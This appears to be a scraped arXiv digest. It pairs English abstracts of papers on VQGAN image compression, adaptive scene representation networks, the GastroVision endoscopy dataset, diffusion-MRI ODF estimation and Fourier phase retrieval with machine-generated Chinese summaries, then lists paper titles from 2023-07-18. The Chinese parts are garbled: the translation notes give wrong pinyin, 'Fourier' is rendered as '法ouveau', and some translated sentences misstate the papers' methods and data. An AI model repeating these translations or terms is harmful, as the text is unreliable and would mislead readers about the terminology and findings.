Recent advances in generative compression methods have demonstrated remarkable progress in enhancing the perceptual quality of compressed data, especially in scenarios with low bitrates. Nevertheless, their efficacy and applicability in achieving extreme compression ratios ($<0.1$ bpp) still remain constrained. In this work, we propose a simple yet effective coding framework by introducing vector quantization (VQ)-based generative models into the image compression domain. The main insight is that the codebook learned by the VQGAN model yields strong expressive capacity, facilitating efficient compression of continuous information in the latent space while maintaining reconstruction quality. Specifically, an image can be represented as VQ-indices by finding the nearest codeword, which can be encoded using lossless compression methods into bitstreams. We then propose clustering a pre-trained large-scale codebook into smaller codebooks using the K-means algorithm. This enables images to be represented as diverse ranges of VQ-indices maps, resulting in variable bitrates and different levels of reconstruction quality. Extensive qualitative and quantitative experiments on various datasets demonstrate that the proposed framework outperforms the state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.

摘要
Translation notes:* "generative compression methods" is translated as "生成压缩方法" (shēngchǎn zhùsuā fāngyì)* "perceptual quality" is translated as "感知质量" (gǎnzhì zhìliàng)* "codebook" is translated as "代码本" (dàimódian)* "VQGAN model" is translated as "VQGAN模型" (VQGAN módeli)* "K-means algorithm" is translated as "K-means算法" (K-means suānfǎ)* "variable bitrates" is translated as "变量比特率" (biànlvèng bǐtiéshù)* "different levels of reconstruction quality" is translated as "不同的重建质量" (bùdōng de zhòngjiàn zhìliàng)

Adaptively Placed Multi-Grid Scene Representation Networks for Large-Scale Data Visualization

paper_url: http://arxiv.org/abs/2308.02494
repo_url: https://github.com/skywolf829/apmgsrn
paper_authors: Skylar Wolfgang Wurster, Tianyu Xiong, Han-Wei Shen, Hanqi Guo, Tom Peterka
for: 这 paper 是为了提高 scientific data 的压缩和可视化而提出的Scene Representation Networks (SRNs)。
methods: 该 paper 使用了适应放置的多重网格 SRN (APMGSRN) 和域 decomposit 训练和推理技术来加速多个 GPU 系统上的训练。
results: 该 paper 表明，使用 APMGSRN 可以提高 SRNs 的重建精度，而无需耗费贵重的 octree 细化、截割和搜索。它还提供了一个开源的 neural volume rendering 应用程序，可以轻松地在任何 PyTorch-based SRN 上进行渲染。

Abstract
Scene representation networks (SRNs) have been recently proposed for compression and visualization of scientific data. However, state-of-the-art SRNs do not adapt the allocation of available network parameters to the complex features found in scientific data, leading to a loss in reconstruction quality. We address this shortcoming with an adaptively placed multi-grid SRN (APMGSRN) and propose a domain decomposition training and inference technique for accelerated parallel training on multi-GPU systems. We also release an open-source neural volume rendering application that allows plug-and-play rendering with any PyTorch-based SRN. Our proposed APMGSRN architecture uses multiple spatially adaptive feature grids that learn where to be placed within the domain to dynamically allocate more neural network resources where error is high in the volume, improving state-of-the-art reconstruction accuracy of SRNs for scientific data without requiring expensive octree refining, pruning, and traversal like previous adaptive models. In our domain decomposition approach for representing large-scale data, we train an set of APMGSRNs in parallel on separate bricks of the volume to reduce training time while avoiding overhead necessary for an out-of-core solution for volumes too large to fit in GPU memory. After training, the lightweight SRNs are used for realtime neural volume rendering in our open-source renderer, where arbitrary view angles and transfer functions can be explored. A copy of this paper, all code, all models used in our experiments, and all supplemental materials and videos are available at https://github.com/skywolf829/APMGSRN.

摘要
Scene representation networks (SRNs) 有最近提出用于数据压缩和可视化的新方法。然而，当前的SRNs不会根据科学数据中复杂的特征进行分配可用的网络参数，导致重建质量下降。我们解决这个缺陷，通过适应地在多个网格上分布多个特性网络（APMGSRN），并提出基于多个GPU系统的域分解训练和执行技术。我们还发布了基于PyTorch的开源神经量化渲染应用，可以方便地在任意的PyTorch-based SRN上进行渲染。我们的APMGSRN架构使用多个空间自适应特征网格，以学习在域中的位置，以动态分配更多的神经网络资源，以提高SRNs的重建精度。在我们的域分解方法中，我们在不同的GPU系统上并行训练多个APMGSRN，以降低训练时间，而不需要昂贵的octree优化、剪辑和搜索。之后，我们使用轻量级的SRN进行实时神经量化渲染。一个包含这篇论文、所有代码、所有在我们实验中用到的模型、以及所有补充材料和视频的报告可以在https://github.com/skywolf829/APMGSRN中找到。

GastroVision: A Multi-class Endoscopy Image Dataset for Computer Aided Gastrointestinal Disease Detection

paper_url: http://arxiv.org/abs/2307.08140
repo_url: https://github.com/debeshjha/gastrovision
paper_authors: Debesh Jha, Vanshali Sharma, Neethi Dasu, Nikhil Kumar Tomar, Steven Hicks, M. K. Bhuyan, Pradip K. Das, Michael A. Riegler, Pål Halvorsen, Ulas Bagci, Thomas de Lange
for:这个研究是为了解决融合实时人工智能（AI）系统在临床实践中的挑战，包括扩展和acceptability。methods:这个研究使用了多中心开放存取的胃肠综合镜像数据集（GastroVision），包括不同的解剖特征、病理异常、肿瘤移除 caso和正常找到（总共27个类别）的胃肠道。数据集包括来自挪威巴鲁姆医院和瑞典卡罗琳斯卡大学医院的8,000幅照片，并由经验轻肠综合医生进行标注和验证。results:我们 validate了我们的数据集的重要性，使用了广泛的benchmarking，基于受欢迎的深度学习基础模型。我们相信我们的数据集可以促进AI基于算法的胃肠疾病检测和分类的发展。我们的数据集可以在 \url{https://osf.io/84e7f/} 上获取。

Abstract
Integrating real-time artificial intelligence (AI) systems in clinical practices faces challenges such as scalability and acceptance. These challenges include data availability, biased outcomes, data quality, lack of transparency, and underperformance on unseen datasets from different distributions. The scarcity of large-scale, precisely labeled, and diverse datasets are the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.

摘要
临床应用人工智能（AI）系统整合面临挑战，包括可扩展性和接受性。这些挑战包括数据可用性、结果偏见、数据质量、透明度不足和不同分布下的性能下降。医疗数据的罕见性是临床整合的主要挑战之一，这也是由于法律限制和精度的手动准备所致。为解决这些挑战，我们介绍了《胃视》，一个多中心开放访问胃肠细胞图像数据集，包括胃肠脏器的不同解剖特征、疾病畸形、肿瘤除除例和正常发现（总共27个类）。该数据集包括8,000张从挪威布莱姆医院和瑞典卡罗琳斯卡大学医院所获取的图像，由经验丰富的胃肠镜头医生进行了标注和验证。此外，我们还验证了我们的数据集的重要性，通过基于深度学习的标准模型的比较。我们认为，我们的数据集可以促进基于AI的胃肠疾病检测和分类算法的发展。我们的数据集可以在中下载。

Neural Orientation Distribution Fields for Estimation and Uncertainty Quantification in Diffusion MRI

paper_url: http://arxiv.org/abs/2307.08138
repo_url: None
paper_authors: William Consagra, Lipeng Ning, Yogesh Rathi
for: 这篇论文主要是用于描述一种新的深度学习方法，用于精确地估算 diffusion MRI（dMRI）信号中的方向分布函数（ODF）。
methods: 该方法使用神经网络（NF）来 parameterize一种随机列表表示的秘密 ODF 场，并通过显式地模型数据中的空间相关性结构，以提高精度和效率。
results: 对于 synthetic 和实际的 in-vivo diffusion数据，该方法与现有方法相比，具有更高的精度和更低的不确定性。

Abstract
Inferring brain connectivity and structure \textit{in-vivo} requires accurate estimation of the orientation distribution function (ODF), which encodes key local tissue properties. However, estimating the ODF from diffusion MRI (dMRI) signals is a challenging inverse problem due to obstacles such as significant noise, high-dimensional parameter spaces, and sparse angular measurements. In this paper, we address these challenges by proposing a novel deep-learning based methodology for continuous estimation and uncertainty quantification of the spatially varying ODF field. We use a neural field (NF) to parameterize a random series representation of the latent ODFs, implicitly modeling the often ignored but valuable spatial correlation structures in the data, and thereby improving efficiency in sparse and noisy regimes. An analytic approximation to the posterior predictive distribution is derived which can be used to quantify the uncertainty in the ODF estimate at any spatial location, avoiding the need for expensive resampling-based approaches that are typically employed for this purpose. We present empirical evaluations on both synthetic and real in-vivo diffusion data, demonstrating the advantages of our method over existing approaches.

摘要
推断脑内连接和结构需要准确地估计Diffusion MRI（dMRI）信号中的方向分布函数（ODF），该函数包含脑组织重要的地方性特性。然而，从dMRI信号中估计ODF是一个困难的反向问题，因为存在干扰、高维度参数空间和缺乏方向测量的问题。在本文中，我们解决这些挑战，提出了一种基于深度学习的方法，用于连续地估计和评估空间变化的ODF场。我们使用神经场（NF）来参数化 latent ODFs 的随机列表表示，间接地模拟了通常被忽略的但有价值的空间相关结构，从而在稀缺和干扰的情况下提高效率。我们 Derive 一个analytic approximation to the posterior predictive distribution，可以用来评估 ODF 估计中任何空间位置的不确定性，避免使用常见的重新采样基本方法。我们在 synthetic 和实际的 in vivo diffusion 数据上进行了实验，并证明了我们的方法的优势。

Untrained neural network embedded Fourier phase retrieval from few measurements

paper_url: http://arxiv.org/abs/2307.08717
repo_url: https://github.com/liyuan-2000/trad
paper_authors: Liyuan Ma, Hongxia Wang, Ningyi Leng, Ziyang Yuan
for: 这篇论文旨在解决快速执行 Fourier 频分析 (FPR) 问题，以减少时间和硬件成本。
methods: 该论文提出了一种基于 alternating direction method of multipliers (ADMM) 框架的无经验神经网络 (NN) 嵌入算法，用于解决 FPR 问题。
results: 实验结果表明，该算法在计算资源少的情况下表现更好，甚至可以与经过训练的神经网络 (NN) 算法竞争。

Abstract
Fourier phase retrieval (FPR) is a challenging task widely used in various applications. It involves recovering an unknown signal from its Fourier phaseless measurements. FPR with few measurements is important for reducing time and hardware costs, but it suffers from serious ill-posedness. Recently, untrained neural networks have offered new approaches by introducing learned priors to alleviate the ill-posedness without requiring any external data. However, they may not be ideal for reconstructing fine details in images and can be computationally expensive. This paper proposes an untrained neural network (NN) embedded algorithm based on the alternating direction method of multipliers (ADMM) framework to solve FPR with few measurements. Specifically, we use a generative network to represent the image to be recovered, which confines the image to the space defined by the network structure. To improve the ability to represent high-frequency information, total variation (TV) regularization is imposed to facilitate the recovery of local structures in the image. Furthermore, to reduce the computational cost mainly caused by the parameter updates of the untrained NN, we develop an accelerated algorithm that adaptively trades off between explicit and implicit regularization. Experimental results indicate that the proposed algorithm outperforms existing untrained NN-based algorithms with fewer computational resources and even performs competitively against trained NN-based algorithms.

摘要
法ouveau频段恢复（FPR）是一项广泛应用的复杂任务，涉及于从傅里叶频域无法量测数据中恢复未知信号。FPR WITH few measurements是一项重要的应用，可以降低时间和硬件成本，但它受到严重的不定性困难。最近，无经过训练的神经网络（NN）已经提供了新的方法，通过引入学习的约束来缓解不定性，不需要任何外部数据。然而，它们可能无法完美地复制图像中的细节，并且可能具有高计算成本。这篇论文提出了一种无经过训练NN嵌入算法，基于 alternating direction method of multipliers（ADMM）框架来解决FPR WITH few measurements。特别是，我们使用一个生成网络来表示要恢复的图像，这使得图像受到生成网络的结构所限制。为了提高图像中高频信息的恢复，我们添加了总变量（TV）正则化，以便促进图像中的本地结构的恢复。此外，为了降低主要由无经过训练NN的参数更新所导致的计算成本，我们开发了一种可适应的加速算法，可以自适应地让拥有更多计算资源的计算机进行更多的计算。实验结果表明，我们的算法比现有的无经过训练NN基于算法更高效，甚至可以与经过训练NN基于算法竞争。

2023-07-18

Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media

Mutual Reinforcement Effects in Japanese Sentence Classification and Named Entity Recognition Tasks

Linearized Relative Positional Encoding

Text vectorization via transformer-based language models and n-gram perplexities

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

Unveiling Gender Bias in Terms of Profession Across LLMs: Analyzing and Addressing Sociological Implications

Attention over pre-trained Sentence Embeddings for Long Document Classification

Towards a Neural Era in Dialogue Management for Collaboration: A Literature Survey

On the (In)Effectiveness of Large Language Models for Chinese Text Correction

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

Mitigating Label Bias via Decoupled Confident Learning

NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning

Teach model to answer questions after comprehending the document

Large Language Models Perform Diagnostic Reasoning

An Integrated NPL Approach to Sentiment Analysis in Satisfaction Surveys

Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge

AlpaGasus: Training A Better Alpaca with Fewer Data

Multilingual Speech-to-Speech Translation into Multiple Target Languages

Retentive Network: A Successor to Transformer for Large Language Models

Multimodal Diffusion Segmentation Model for Object Segmentation from Manipulation Instructions

2023-07-18

Enhancing Pattern Classification in Support Vector Machines through Matrix Formulation

Explanation-Guided Fair Federated Learning for Transparent 6G RAN Slicing

Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives

An Evaluation of Zero-Cost Proxies – from Neural Architecture Performance to Model Robustness

MOCA: Self-supervised Representation Learning by Predicting Masked Online Codebook Assignments

Using the IBM Analog In-Memory Hardware Acceleration Kit for Neural Network Training and Inference

Learning to Select SAT Encodings for Pseudo-Boolean and Linear Integer Constraints

Towards Automated Semantic Segmentation in Mammography Images

Exploiting Field Dependencies for Learning on Categorical Data

Biomaker CA: a Biome Maker project using Cellular Automata

Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media

Automatic Differentiation for Inverse Problems with Applications in Quantum Transport

EigenTrajectory: Low-Rank Descriptors for Multi-Modal Trajectory Forecasting

Conformal prediction under ambiguous ground truth

FlexiAST: Flexibility is What AST Needs

End-to-End Neural Network Training for Hyperbox-Based Classification

Mobility-Aware Joint User Scheduling and Resource Allocation for Low Latency Federated Learning

Adaptive Topological Feature via Persistent Homology: Filtration Learning for Point Clouds

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

UniTabE: Pretraining a Unified Tabular Encoder for Heterogeneous Tabular Data

Application of BERT in Wind Power Forecasting-Teletraan’s Solution in Baidu KDD Cup 2022

Towards Sustainable Deep Learning for Multi-Label Classification on NILM

Fusing Hand and Body Skeletons for Human Action Recognition in Assembly

Detecting Throat Cancer from Speech Signals Using Machine Learning: A Reproducible Literature Review

How Many Neurons Does it Take to Approximate the Maximum?

Automated Ableism: An Exploration of Explicit Disability Biases in Sentiment and Toxicity Analysis Models

Context-Conditional Navigation with a Learning-Based Terrain- and Robot-Aware Dynamics Model

Learning Dynamic Attribute-factored World Models for Efficient Multi-object Reinforcement Learning

Federated Learning for Computationally-Constrained Heterogeneous Devices: A Survey

ECSIC: Epipolar Cross Attention for Stereo Image Compression

Towards Trustworthy Dataset Distillation

MVA2023 Small Object Detection Challenge for Spotting Birds: Dataset, Methods, and Results

Characterization of partial wetting by CMAS droplets using multiphase many-body dissipative particle dynamics and data-driven discovery based on PINNs

Mining of Single-Class by Active Learning for Semantic Segmentation

Non-stationary Delayed Combinatorial Semi-Bandit with Causally Related Rewards

A Federated learning model for Electric Energy management using Blockchain Technology

DiTTO: Diffusion-inspired Temporal Transformer Operator

Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net

Learning Adaptive Neighborhoods for Graph Neural Networks

Extreme heatwave sampling and prediction with analog Markov chain and comparisons with deep learning

Deep learning for unsupervised domain adaptation in medical imaging: Recent advancements and future perspectives

Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces

Outlier-Robust Tensor Low-Rank Representation for Data Clustering

qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers

U-shaped Transformer: Retain High Frequency Context in Time Series Analysis

Multimodal LLMs for health grounded in individual-specific data

PLiNIO: A User-Friendly Library of Gradient-based Methods for Complexity-aware DNN Optimization

How is ChatGPT’s behavior changing over time?

OxfordVGG Submission to the EGO4D AV Transcription Challenge

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

Oracle Efficient Online Multicalibration and Omniprediction

GraphCL-DTA: a graph contrastive learning with molecular semantics for drug-target binding affinity prediction

Neural Network Pruning as Spectrum Preserving Process

A Unifying Framework for Differentially Private Sums under Continual Observation

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

Landscape Surrogate: Learning Decision Losses for Mathematical Optimization Under Partial Information

REX: Rapid Exploration and eXploitation for AI Agents